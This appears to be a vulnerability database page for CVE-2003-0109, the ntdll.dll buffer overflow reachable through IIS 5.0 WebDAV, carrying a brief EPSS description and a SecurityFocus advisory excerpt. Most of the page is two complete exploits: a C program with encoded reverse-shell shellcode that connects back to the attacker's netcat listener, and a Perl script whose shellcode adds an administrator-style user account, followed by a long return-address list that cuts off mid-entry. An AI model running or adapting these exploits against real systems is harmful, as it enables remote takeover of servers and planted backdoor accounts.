CVE-2003-0109 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/*******************************************************************/ /* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */ /* --------------------------------------------------------------- */ /* this is the exploit for ntdll.dll through WebDAV. */ /* run a netcat ex: nc -L -vv -p 666 */ /* wb server.com your_ip 666 0 */ /* the shellcode is a reverse remote shell */ /* you need to pad a bit.. the best way I think is launching */ /* the exploit with pad = 0 and after that, the server will be */ /* down for a couple of seconds, now retry with pad at 1 */ /* and so on..pad 2.. pad 3.. if you haven't the shell after */ /* something like pad at 10 I think you better to restart from */ /* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */ /* on all the others servers it was at 2,3,4, etc..sometimes */ /* you can have the force with you, and get the shell in 1 try */ /* sometimes you need to pad more than 10 times ;) */ /* the shellcode was coded by myself, it is SEH + ScanMem to */ /* find the famous offsets (GetProcAddress).. */ /* */ /*******************************************************************/ #include <winsock.h> #include <windows.h> #include <stdio.h> #pragma comment (lib,"ws2_32") char shellc0de[] = "\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc" "\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8" "\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33" "\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6" "\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08" "\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64" "\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81" "\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8" "\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b" "\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f" "\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24" "\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd" "\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83" "\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00" "\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d" "\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51" "\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c" "\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56" "\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00" "\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d" "\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d" "\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8" "\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a" "\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20" "\xff\xd0" "CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00" "connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00" "cmd" // don't change anything.. "\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver.. "\x00\x00\xe8\x77" "\x00\x00\xf0\x77" "\x00\x00\xe4\x77" "\x00\x88\x3e\x04" // win2k3 "\x00\x00\xf7\xbf" // win9x =P "\xff\xff\xff\xff"; int test_host(char *host) { char search[100]=""; int sock; struct hostent *heh; struct sockaddr_in hmm; char buf[100] =""; if(strlen(host)>60) { printf("error: victim host too long.\r\n"); return 1; } if ((heh = gethostbyname(host))==0){ printf("error: can't resolve '%s'",host); return 1; } sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host); hmm.sin_port = htons(80); hmm.sin_family = AF_INET; hmm.sin_addr = *((struct in_addr *)heh->h_addr); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("error: can't create socket"); return 1; } printf("Checking WebDav on '%s' ... ",host); if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){ printf("CONNECTING_ERROR\r\n"); return 1; } send(sock,search,strlen(search),0); recv(sock,buf,sizeof(buf),0); if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1') return 0; printf("NOT FOUND\r\n"); return 1; } void help(char *program) { printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program); return; } void banner(void) { printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]\r\n"); printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n"); return; } void main(int argc, char *argv[]) { WSADATA wsaData; unsigned short port=0; char *port_to_shell="", *ip1="", data[50]=""; unsigned int i,j; unsigned int ip = 0 ; int s, PAD=0x10; struct hostent *he; struct sockaddr_in crpt; char buffer[65536] =""; char request[80000]; // huuuh, what a mess! :) char content[] = "<?xml version=\"1.0\"?>\r\n" "<g:searchrequest xmlns:g=\"DAV:\">\r\n" "<g:sql>\r\n" "Select \"DAV:displayname\" from scope()\r\n" "</g:sql>\r\n" "</g:searchrequest>\r\n"; banner(); if((argc<4)||(argc>5)) { help(argv[0]); return; } if(WSAStartup(0x0101,&wsaData)!=0) { printf("error starting winsock.."); return; } if(test_host(argv[1])) return; if(argc==5) PAD+=atoi(argv[4]); printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD); ip = inet_addr(argv[2]); ip1 = (char*)&ip; shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2]; shellc0de[451]=ip1[3]; port = htons(atoi(argv[3])); port_to_shell = (char *) &port; shellc0de[446]=port_to_shell[0]; shellc0de[447]=port_to_shell[1]; // we xor the shellcode [xored by 0x95 to avoid bad chars] __asm { lea eax, shellc0de add eax, 0x34 xor ecx, ecx mov cx, 0x1b0 wah: xor byte ptr[eax], 0x95 inc eax loop wah } if ((he = gethostbyname(argv[1]))==0){ printf("error: can't resolve '%s'",argv[1]); return; } crpt.sin_port = htons(80); crpt.sin_family = AF_INET; crpt.sin_addr = *((struct in_addr *)he->h_addr); if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("error: can't create socket"); return; } printf("Connecting... "); if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){ printf("ERROR\r\n"); return; } // No Operation. for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++); // fill the buffer with the shellcode for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++); // well..it is not necessary.. for(i=0;i<2500;buffer[i]=PAD,i++); /* we can simply put our ret in this 2 offsets.. */ //buffer[2086]=PAD; //buffer[2085]=PAD; buffer[sizeof(buffer)]=0x00; memset(request,0,sizeof(request)); memset(data,0,sizeof(data)); sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]); sprintf(request,"%s%d\r\n\r\n",request,strlen(content)); printf("CONNECTED\r\nSending evil request... "); send(s,request,strlen(request),0); send(s,content,strlen(content),0); printf("SENT\r\n"); recv(s,data,sizeof(data),0); if(data[0]!=0x00) { printf("Server seems to be patched.\r\n"); printf("data: %s\r\n",data); } else printf("Now if you are lucky you will get a shell.\r\n"); closesocket(s); return; } // milw0rm.com [2003-03-23]

E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/ source: https://www.securityfocus.com/bid/7116/info The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker. Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface. ** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP does not also include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances. ** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks. ** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function. ** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability. #!/bin/perl # # 2003.3.24 # # [email protected] # [email protected] # # tested on Windows 2000 Advanced Server SP3: Korean language edition # ntdll.dll with 2002.7.3 version # You need to change some parameters to make this exploit work on your platform of choice # # This exploit uses unicode decoder scheme and self-modifies unicoded shellcode to original one. # use Socket; if($#ARGV<0) { die "usage: wd.pl <target hostname>\n"; } my $host=$ARGV[0]; my $url_len=65514; #LOCK: 65514 #SEARCH: 65535 my $host_header="Host: $host\r\n"; my $translate_f="Translate: f\r\n"; $translate_f=""; my $port=80; my $depth="Depth: 1\r\n"; $depth=""; my $connection_str="Connection: Close\r\n"; $connection_str=""; my $url2="B"; $url2=""; my $cont="C"; my $lock_token="Lock-Token: $cont\r\n"; $lock_token=""; my $destination="Destination: /$url2\r\n"; $destination=""; # LoadLibrary: 0x100107c; # GetProcAddress 0x1001034; # WinExec("net user matt 1234 /ADD") # this shellcode is encoded to printable string form my $shellcode="\x34\x34\x30\x2e\x2c\x2a\x61\x62\x48\x48\x2a\x2a\x2c\x2d\x7f\x80\x68\x69\x2c\x2c\x18\x19\x64\x65\x58\x59\x0c\x07%u0411%u00f0\x67\x67\x2c\x2a\x31\x2e\x18\x19\x64\x65\x58\x59\x7e\x7f\x56\x56\x1a\x1a\x4c\x4d\x55\x55\x71\x71\x7d\x7d\x38\x39\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x62\x62\x0c\x0c\x3b\x39\x4e\x4e\x6c\x6d\x6c\x6d\x4c\x4d\x38\x38\x5f\x60\x4c\x4d\x4c\x4d\x4c\x4d\x64\x64\x67\x68\x78\x79\x72\x73\x44\x45\x4c\x4d\x4c\x4c\x61\x62\x33\x33\x45\x46\x08\x08\x2d\x2d\x60\x60\x08\x08\x33\x34\x64\x64\x67\x68\x65\x65\x78\x79\x56\x57\x44\x45\x4c\x4d\x4c\x4c\x61\x62\x33\x33\x45\x46\x64\x65\x1a\x1b\x0e\x0f\x2c\x2d\x76\x76\x31\x31\x60\x61\x19\x19\x60\x60\x3d\x3e\x3b\x38\x2d\x2d\x0c\x08\x16\x16\x07\x08\x6c\x6d\x6c\x6d\x4c\x4d\x0c\x08\x12\x12\x03\x03\x6c\x6d\x6c\x6d\x4c\x4d\x79\x7a\x4f\x50\x60\x60\x38\x39\x31\x2e\x33\x33\x33\x33\x33\x33\x54\x54\x27\x24\x65\x66\x08\x08\x3b\x38\x0c\x0c\x2d\x2e\x29\x29\x6c\x6d\x6c\x6d\x4c\x4d\x65\x66\x33\x33\x06\x06\x03\x03\x6c\x6d\x6c\x6d\x4c\x4d\x33\x33\x16\x16\x38\x38\x6c\x6d\x6c\x6d\x4c\x4d\x08\x08\x39\x39\x0c\x0c\x2d\x2d\x3b\x39\x6c\x6d\x6c\x6d\x4c\x4d\x65\x65\x64\x65\x08\x08\x2d\x2d\x33\x33\x06\x06\x1d\x1d\x6c\x6d\x6c\x6d\x4c\x4d\x65\x65\x33\x33\x06\x06\x1f\x1f\x6c\x6d\x6c\x6d\x4c\x4d\x54\x54\x27\x24\x04\x05\x04\x05\x65\x66\x08\x08\x3b\x38\x0c\x0c\x2d\x2e\x27\x27\x6c\x6d\x6c\x6d\x4c\x4d\x65\x66\x33\x33\x06\x06\x19\x19\x6c\x6d\x6c\x6d\x4c\x4d\x33\x33\x06\x06\x1b\x1b\x6c\x6d\x6c\x6d\x4c\x4d\x69\x69\x6e\x6e\x65\x66\x6b\x6c\x6e\x6e\x6a\x6b\x55\x55\x55\x56\x4c\x4d\x63\x63\x7a\x7b\x7d\x7d\x75\x76\x7e\x7e\x7c\x7c\x76\x77\x4c\x4d\x63\x63\x7a\x7b\x77\x77\x75\x76\x78\x78\x76\x77\x7e\x7e\x4c\x4d\x63\x63\x7a\x7b\x7d\x7d\x7a\x7b\x7b\x7b\x75\x75\x7e\x7e\x4c\x4d\x67\x67\x78\x78\x7b\x7c\x6e\x6e\x70\x71\x7e\x7e\x7d\x7d\x4c\x4d\x6e\x6e\x70\x71\x78\x78\x76\x77\x64\x65\x75\x76\x7b\x7b\x7d\x7d\x7e\x7e\x75\x75\x75\x75\x4c\x4d\x7d\x7d\x51\x52\x62\x63\x76\x77\x5d\x5a\x7e\x7e\x70\x71\x7e\x7e\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x7b\x7c\x7e\x7e\x76\x77\x5e\x5b\x76\x76\x75\x75\x7e\x7e\x75\x76\x5e\x5b\x7a\x7a\x7c\ 5\x56\x57\x5e\x5b\x5b\x5b\x7c\x7c\x7e\x7f\x7e\x7f\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x76\x77\x5d\x5a\x7e\x7e\x70\x71\x7e\x7e\x4c\x4d\x4e\x4e\x4c\x4d\x4c\x4d\x4c\x4d\x76\x77\x7e\x7e\x75\x75\x76\x77\x49\x4a"; my $body="<?xml version=\"1.0\">\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"; my $length_of_body=length($body); # # jmp ebx,call ebx addresses # my @return_addresses=( "%u32ac%u77e2", "%uc1b5%u76ae", "%u005d%u77a5", "%u0060%u776b", "%u00b4%u77a5", "%u00e6%u77ac", "%u014a%u7766", "%u0392%u7511", "%u03a0%u7511", "%u0900%u6df1", "%u0900%u778b", "%u1167%u6b32", "%u1184%u6ed4", "%u1192%u6b3e", "%u11b1%u779e", "%u11b9%u777f", "%u11b9%u782c", "%u11d3%u7834", "%u1800%u749e", "%u20ac%u777f", "%u215c%u777e", "%u2171%u7766", "%u2172%u6b3a", "%u2191%u6e6f", "%u21d4%u6e6f", "%u2283%u730a", "%u24b9%u7763", "%u24d5%u7763", "%u24e8%u7761", "%u2503%u7834", "%u2514%u77e2", "%u251e%u77db", "%u2521%u7761", "%u2527%u77db", "%u2530%u77db", "%u253c%u77e2", "%u2547%u77dc", "%u2592%u77dc", "%u266d%u76ae", "%u2e00%u76ae", "%u300e%u74da", "%u300e%u74e3", "%u306c%u7766", "%u30a5%u77e5", "%u30b0%u77e5", "%u327b%u6e44", "%u327b%u6e5e", "%u329b%u6e44", "%u329b%u6e5e", "%u329c%u77e2", "%u3384%u7779", "%u3384%u777e", "%u3397%u6e00", "%u33d0%u76ae", "%u3700%u777f", "%u4e5e%u7900", "%u4ea4%u7325", "%u4ec0%u77db", "%u4ef2%u77ac", "%u4f73%u749f", "%u4fd4%u77dc", "%u4ff1%u749f", "%u5023%u749f", "%u5078%u77a5", "%u5112%u77dc", "%u5121%u749f", "%u5144%u77dc", "%u5146%u77e2", "%u514e%u77ac", "%u518d%u6dee", "%u51c4%u7387", "%u5237%u77ac", "%u52a0%u777f", "%u52a0%u782c", "%u52d5%u777f", "%u52d5%u782c", "%u52f8%u7800", "%u5339%u6b3a", "%u5339%u777f", "%u5366%u7740", "%u555e%u741b", "%u5653%u749e", "%u5718%u6c7e", "%u574d%u7901", "%u5775%u7901", "%u5806%u7325", "%u5821%u777f", "%u5821%u782c", "%u5831%u777f", "%u5831%u782c", "%u587c%u777f", "%u587c%u782c", "%u58c5%u777f", "%u58d5%u777f", "%u58fd%u777f", "%u58fd%u782c", "%u5949%u72fc", "%u5949%u777f", "%u5955%u72fc", "%u5967%u777f", "%u5997%u777f", "%u5997%u782c", "%u59bb%u777e", "%u59d4%u777e", "%u5a25%u777f", "%u5a25%u782c", "%u5ac9%u777f", "%u5b5a%u6c7e", "%u5b64%u777f", "%u5b8f%u6731", "%u5b9c%u6731", "%u5b9c%u6e44", "%u5c04%u777f", "%u5c0f%u6c7e", "%u5c3b%u777f", "%u5c3b%u782c", "%u5c4e%u6c7e", "%u5cfb%u76ae", "%u5da0%u7511", "%u5da2%u777f", "%u5de6%u77e5", "%u5deb%u777f", "%u5deb%u782c", "%u5e00%u6c11", "%u5e0c%u7325", "%u5e2b%u777f", "%u5e3f%u7511", "%u5e55%u777f", "%u5e63%u7325", "%u5eb8%u7325", "%u5ef7%u7325", "%u5f13%u7325", "%u5f17%u77e3", "%u5f1b%u777f", "%u5f1b%u782c", "%u5f62%u7325", "%u5f7f%u72fc", "%u5f99%u7325", "%u5fb7%u6c11", "%u5fcc%u7763", "%u601d%u77dc", "%u609a%u7387", "%u60f6%u72fc", "%u611f%u77bf", "%u6144%u74da", "%u6144%u74e3", "%u6198%u7763", "%u61a9%u74da", "%u61a9%u74e3", "%u61fa%u66c7", "%u61fa%u671b", "%u620a%u7325", "%u6284%u66c7", "%u62c8%u7763", "%u62db%u72fc", "%u62f1%u72fc", "%u63a9%u77bc", "%u63ed%u779e", "%u64bb%u7761", "%u64c1%u72fd", "%u64e2%u777f", "%u64e2%u782c", "%u64f4%u777f", "%u65b9%u6ed4", "%u6600%u6ed4", "%u66a0%u6c6d", "%u66b3%u6c6d", "%u66f3%u6c6d", "%u66f8%u7387", "%u674f%u7763", "%u67b0%u7740", "%u67b3%u6ed4", "%u67d2%u749e", "%u6816%u6ed4", "%u6842%u779e", "%u6881%u779e", "%u6894%u779e", "%u68b3%u777e", "%u6977%u76ae", "%u6a19%u7763", "%u6a44%u7763", "%u6aa3%u7518", "%u6c60%u77bc", "%u6c81%u7693", "%u6c82%u77bf", "%u6c92%u77bc", "%u6cb8%u7693", "%u6cdb%u777f", "%u6ce5%u777f", "%u6ceb%u7693", "%u6d11%u777f", "%u6d11%u782c", "%u6d87%u77dc", "%u6d89%u7693", "%u6e2f%u7693", "%u6e4d%u76ae", "%u6f94%u77e9", "%u6fae%u77bc", "%u6fe9%u749e", "%u7006%u77e9", "%u7028%u7901", "%u70ab%u77ac", "%u70ac%u7387", "%u70dd%u77ac", "%u70dd%u784f", "%u70fd%u77bb", "%u711a%u6731", "%u7199%u7387", "%u71d0%u77bb", "%u71fc%u77bb", "%u722d%u6df3", "%u7258%u7515", "%u725f%u77db", "%u72a2%u77a5", "%u72c4%u7325", "%u73fe%u6ed4", "%u745f%u76ae", "%u748b%u730a", "%u74d8%u6df3", "%u74e3%u6df3", "%u7575%u7518", "%u7642%u6c0f", "%u76de%u7325", "%u7704%u7325", "%u77dc%u7693", "%u78a9%u77e2", "%u78bb%u77bb", "%u790e%u6995", "%u797a%u6995", "%u79b1%u6995", "%u79b1%u7740", "%u79d1%u77bb", "%u79e7%u6995", "%u79e9%u72fd", "%u7a00%u78fb", "%u7a05%u72fd", "%u7a3b%u72fd", "%u7a57%u7387", "%u7aba%u6995", "%u7af9%u6c13", "%u7b19%u76ae", "%u7b6e%u777f", "%u7b6e%u782c", "%u7c83%u7763", "%u7c97%u7763", "%u7ca5%u7763", "%u7d8f%u77e5", "%u7dbe%u779e", "%u7de1%u779e", "%u7e1f%u6df1", "%u7e1f%u778b", "%u7e52%u6995", "%u7f55%u77a5", "%u7fa8%u77a5", "%u7fd5%u76ae", "%u8018%u775b", "%u807d%u7387", "%u80a5%u775b", "%u8178%u775b", "%u81c0%u77db", "%u82ad%u6c11", "%u82d5%u65f1", "%u832f%u77db", "%u8339%u76ae", "%u83d3%u6df3", "%u843d%u7387", "%u8563%u77ac", "%u8805%u7740", "%u881f%u77db", "%u8840%u77bc", "%u8892%u7740", "%u8892%u77ac", "%u8a23%u6731", "%u8a23%u7693", "%u8a23%u77ad", "%u8af1%u76ae", "%u8b17%u6ed4", "%u8b39%u76ae", "%u8c6b%u77bf", "%u8c7a%u77bc", "%u8ca2%u77bc", "%u8cac%u6df1", "%u8cac%u778b", "%u8d70%u6995", "%u8dbe%u7740", "%u8dcb%u77ad", "%u8dcf%u777e", "%u8e87%u6995", "%u8f09%u6b32", "%u9187%u76ae", "%u925e%u749e", "%u92f8%u77ad", "%u932e%u76ae", "%u93ac%u7740", "%u9640%u6995", "%u980a%u7763", "%u984e%u6df3", "%u985e%u7763", "%u98dc%u7740", "%u9920%u7916", "%u9957%u77a5", "%u9a5a%u779e", "%u9b27%u6ed3", "%u9cf6%u7518", "%u9d26%u7518", "%u9d5d%u7300", "%u9d72%u7763", "%u9edc%u7901", "%u9ede%u77e9", "%ua300%u76ae", "%uac16%u7900", "%uac17%u77db", "%uac17%u7832", "%uac4b%u77db", "%uac4b%u7900", "%uac52%u76ae", "%uac5a%u76ae", "%uac71%u7693", "%uac84%u77e9", "%uac97%u77e3", "%uaca2%u6ed3", "%uaca4%u6c0f", "%uaca4%u77e9", "%uacac%u6c0f", "%uacaf%u77e3", "%uacb6%u6ed3", "%uacc8%u7693", "%uace0%u7761", "%uacfb%u7761", "%uad0d%u77e2", "%uad13%u7900", "%uad18%u779e", "%uad25%u7900", "%uad27%u6ed3", "%uad45%u77e2", "%uad5b%u7900", "%uad5f%u7387", "%uad73%u6995", "%uad73%u6b32", "%uad7a%u6b32", "%uada6%u775b", "%uadab%u7900", "%uadc4%u7387", "%uadf0%u76ae", "%uadf9%u6995", "%uae12%u76ae", "%uae80%u77e5", "%uae96%u77e5", "%uaf17%u77e3", "%uafa2%u779e", "%ub00a%u77e5", "%ub05d%u77e5", "%ub0c0%u6b32", "%ub0ef%u7518", "%ub100%u6b32", "%ub100%u7518", "%ub119%u7518", "%ub138%u672e", "%ub169%u6b32", "%ub177%u672e", "%ub181%u6b32", "%ub1cb%u6ed4", "%ub1da%u6ed4", "%ub206%u6b32", "%ub216%u6c0f", "%ub23f%u7802", "%ub240%u7693", "%ub246%u6c0f", "%ub260%u7693", "%ub273%u76ae", "%ub276%u6c0f", "%ub27e%u779e", "%ub288%u76ae", "%ub293%u77e2", "%ub29c%u72fd", "%ub2a3%u6c0f", "%ub2b7%u72fd", "%ub2ca%u77e2", "%ub2ef%u76ae", "%ub342%u76ae", "%ub3a2%u749e", "%ub3b8%u749e", "%ub3be%u749e", "%ub3c3%u741b", "%ub3f4%u741b", "%ub405%u7802", "%ub43a%u76ae", "%ub44e%u6df1", "%ub44e%u778b", "%ub450%u76ae", "%ub456%u6df1", "%ub456%u778b", "%ub468%u6ed3", "%ub483%u76ae", "%ub484%u72fd", "%ub48b%u72fd", "%ub498%u76ae", "%ub4a6%u6995", "%ub4af%u76ae", "%ub4c0%u76ae", "%ub4e8%u7832", "%ub52d%u6995", "%ub549%u77db", "%ub554%u6995", "%ub565%u77db", "%ub56e%u77e9", "%ub61d%u7763", "%ub61f%u77e9", "%ub62c%u7763", "%ub652%u77e9", "%ub65e%u77e9", "%ub66a%u77e9", "%ub6a4%u77db", "%ub6a7%u7900", "%ub6af%u6ed4", "%ub6b7%u6ed4", "%ub6b8%u77db", "%ub6d5%u7900", "%ub6dd%u77ad", "%ub6dd%u77b0", "%ub6ec%u77ad", "%ub6ec%u77b0", "%ub6f4%u77ad", "%ub6f4%u77b0", "%ub6f7%u7763", "%ub6fc%u749e", "%ub70e%u77ad", "%ub712%u749e", "%ub718%u749e", "%ub778%u77e9", "%ub784%u77e9", "%ub790%u77e9", "%ub79c%u77e9", "%ub7a8%u77e9", "%ub7ac%u77ad", "%ub7b4%u77e9", "%ub7c0%u77e9", "%ub7cc%u77e9", "%ub7d8%u77e9", "%ub803%u775b", "%ub819%u77ad", "%ub992%u7763", "%ub9aa%u7832", "%ub9ce%u7763", "%ub9d6%u7832", "%uba10%u7832", "%uba38%u7832", "%uba6b%u77ad", "%uba6b%u77b0", "%uba73%u77ac", "%uba74%u77ad", "%uba74%u77b0", "%uba7a%u77ad", "%uba7a%u77b0", "%uba7e%u77ad", "%uba7e%u77b0", "%uba8e%u7834", "%uba9f%u7900", "%ubaa8%u7834", "%ubaae%u6876", "%ubae8%u7900", "%ubb34%u6876", "%ubc0f%u77e5", "%ubc37%u77e5", "%ubcf9%u7834", "%ubd00%u6c0f", "%ubd24%u7834", "%ubd38%u6c0f", "%ubd65%u6c0f", "%ubdb3%u672e", "%ubdc8%u7740", "%ubde6%u77db", "%ube03%u672e", "%ube1a%u7740", "%ube30%u7901", "%ube31%u77e5", "%ube43%u7901", "%ube53%u6995", "%ube65%u77db", "%ube75%u77e5", "%ube87%u77db", "%ubebd%u77db", "%ubecf%u6995", "%ubef8%u6995", "%ubf37%u7834", "%ubf45%u7834", "%ubf65%u76ae", "%ubf83%u7900", "%ubf8a%u6995", "%ubf92%u7900", "%ubf9e%u7900", "%ubfaa%u7900", "%ubfba%u76ae", "%ubfbf%u6c7e", "%ubfc5%u77db", "%ubfd2%u7900", "%ubfe1%u7900", "%ubfed%u7900", "%ubff9%u7900", "%uc003%u76ae", "%uc02e%u77db", "%uc02f%u77db", "%uc036%u6995", "%uc03a%u77db", "%uc03e%u6c7e", "%uc03f%u6995", "%uc054%u76ae", "%uc058%u6c7e", "%uc0d5%u76ae", "%uc0ee%u76ae", "%uc120%u76ae", "%uc142%u76ae", "%uc189%u65f1", "%uc1bc%u65f1", "%uc1ef%u65f1", "%uc1f3%u6b32", "%uc1f7%u77e2", "%uc21f%u6b32", "%uc268%u76ae", "%uc268%u77e2", "%uc277%u76ae", "%uc27f%u7834", "%uc286%u76ae", "%uc291%u77e2", "%uc295%u76ae", "%uc2a8%u76ae", "%uc2d1%u76ae", "%uc2e0%u76ae", "%uc2ef%u76ae", "%uc2fe%u76ae", "%uc306%u7834", "%uc30d%u76ae", "%uc32a%u7834", "%uc344%u7834", "%uc35e%u7834", "%uc39d%u6ed4", "%uc3de%u6ed4", "%uc3df%u6df1", "%uc3df%u778b", "%uc401%u7834", "%uc445%u7834", "%uc449%u6df1", "%uc449%u778b", "%uc459%u7834", "%uc4f0%u7834", "%uc504%u77dc", "%uc56b%u7834", "%uc578%u77e9", "%uc57a%u6c0f", "%uc583%u76ae", "%uc597%u76ae", "%uc5d6%u77ac", "%uc5d7%u77ac", "%uc5e1%u77ac", "%uc5eb%u77ac", "%uc663%u76ae", "%uc676%u6e44", "%uc676%u6e5e", "%uc677%u76ae", "%uc6f3%u6c42", "%uc748%u76ae", "%uc776%u76ae", "%uc7a0%u77e2", "%uc7da%u6b32", "%uc7e1%u6b32", "%uc7e5%u77e2", "%uc860%u72c2", "%uc860%u775b", "%uc86d%u72c2", "%uc86d%u775b", "%uc87d%u72c2", "%uc87d%u775b", "%uc88d%u72c2", "%uc88d%u775b", "%uc89d%u72c2", "%uc89d%u775b", "%uc8ad%u72c2", "%uc8ad%u775b", "%uc8ba%u72c2", "%uc8ba%u775b", "%uc8c7%u72c2", "%uc8c7%u775b", "%uc8d4%u72c2", "%uc8d4%u775b", "%uc8e0%u77ac", "%uc8fc%u77db", "%uc936%u77db", "%uc9d3%u77ac", "%uc9f5%u6c0f", "%uca02%u77ac", "%uca25%u77ac", "%uca2e%u6c0f", "%uca5b%u77e9", "%uca84%u77e9", "%ucad1%u77e9", "%ucaf1%u77e9", "%ucb4f%u749e", "%ucb72%u76ae", "%ucb7a%u751a", "%ucb7b%u76ae", "%ucb7e%u7763", "%ucb85%u7763", "%ucb8f%u751a", "%ucb98%u749e", "%ucba4%u751a", "%ucbae%u749f", "%ucbd0%u77db", "%ucc05%u749f", "%ucc53%u76ae", "%ucc81%u6df5", "%ucc89%u6df5", "%ucc8a%u76ae", "%uccb5%u7901", "%uccc7%u760d", "%uccd6%u741b", "%uccda%u760d", "%ucd00%u741b", "%ucd0f%u7901", "%ucd2a%u741b", "%ucd31%u7901", "%ucd3c%u7518", "%ucd3c%u7901", "%ucdb0%u7761", "%ucdb5%u7761", "%ucdb8%u7761", "%ucdf4%u741b", "%ucdf9%u77e5", "%uce2e%u7518", "%uce46%u741b", "%uce6a%u77e5", "%uce74%u7518", "%uce93%u77e5", "%uce98%u7518", "%ucf69%u6df5", "%ucf71%u6df5", "%ucf9c%u76ae", "%ucfa6%u76ae", "%ud067%u77db", "%ud0a2%u77db", "%ud0c5%u6b32", "%ud109%u6b32", "%ud11b%u77dc", "%ud163%u7901", "%ud17c%u7900", "%ud181%u7900", "%ud1a6%u749f", "%ud1d2%u77ac", "%ud1e0%u7901", "%ud1ed%u77ac", "%ud1f7%u749f", "%ud1f7%u7900", "%ud1fc%u7900", "%ud206%u7763", "%ud21c%u7834", "%ud221%u7763", "%ud225%u7834", "%ud259%u6df5", "%ud279%u749f", "%ud287%u7834", "%ud290%u7834", "%ud2b6%u77e5", "%ud2cd%u7900", "%ud2d2%u7900", 